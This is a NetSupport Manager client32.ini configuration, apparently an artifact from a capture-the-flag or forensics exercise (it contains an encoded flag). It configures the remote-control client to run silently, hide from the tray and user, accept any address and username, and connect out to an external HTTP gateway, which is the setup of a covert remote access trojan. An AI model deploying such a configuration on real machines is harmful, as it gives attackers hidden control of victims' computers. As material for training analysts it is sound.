0x435302e0

[Client]
_present=1
DisableChat=1
DisableClientConnect=1
DisableDisconnect=1
DisableLocalInventory=1
DisableMessage=1
DisableReplayMenu=1
DisableRequestHelp=1
HideWhenIdle=1
Protocols=3
RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA
Shared=1
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
Usernames=*
ValidAddresses.TCP=*

[_Info]
Filename=C:\Users\Administrator\Desktop\Svservices\client32.ini

[_License]
quiet=1

[Audio]
DisableAudioFilter=1

[Bridge]
PasswordFile=C:\Program Files\NetSupport\NetSupport Manager\bridgegevvwe21.psw
Flag=ZmxhZ3tiNmU1NGQwYTBhNWYyMjkyNTg5YzM4NTJmMTkzMDg5MX0NCg==

[General]
BeepUsingSpeaker=0

[HTTP]
GatewayAddress=polygonben.github.io
gsk=FN;J?ACCHJ<O?CBEGB;MEC:B
gskmode=0
GSK=FN;J?ACCHJ<O?CBEGB;MEC:B
GSKX=FP;L?CCEHL=A?EBGGD;O:ABA;D@C
Port=443
SecondaryGateway=@polygonben
SecondaryPort=443
